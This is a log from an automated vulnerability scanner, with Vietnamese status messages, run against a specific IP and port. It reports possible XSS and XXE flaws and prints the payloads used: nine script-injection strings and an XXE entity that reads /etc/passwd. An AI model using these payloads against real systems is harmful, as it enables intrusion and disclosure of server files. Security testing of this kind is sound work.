[TIME] 2025-08-11 04:57:58
[URL] http://103.97.125.56:31007/
[SUMMARY] XSS, XXE
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://103.97.125.56:31007/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng SQLi.


======= XSS =======
[*] Đang kiểm tra XSS trên: http://103.97.125.56:31007/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công XSS với các payloads:
    - <script>alert(1)</script>
    - '><svg/onload=alert(3)>
    - "><img src=x onerror=alert(2)>
    - <details open ontoggle=alert(7)>
    - <video src=1 onerror=alert(9)>
    - <marquee onstart=alert(8)>
    - "><svg onmouseover=alert(4)>
    - <iframe src="javascript:alert(5)">
    - <math href="javascript:alert(6)">


======= LFI =======
[*] Đang kiểm tra LFI trên: http://103.97.125.56:31007/
[✓] Không phát hiện lỗ hổng LFI.


======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://103.97.125.56:31007/
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: http://103.97.125.56:31007/
[!] Có thể bị tấn công XXE với các payloads:
    - <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    - <?xml version="1.0" ?>
    - <foo>&xxe;</foo>


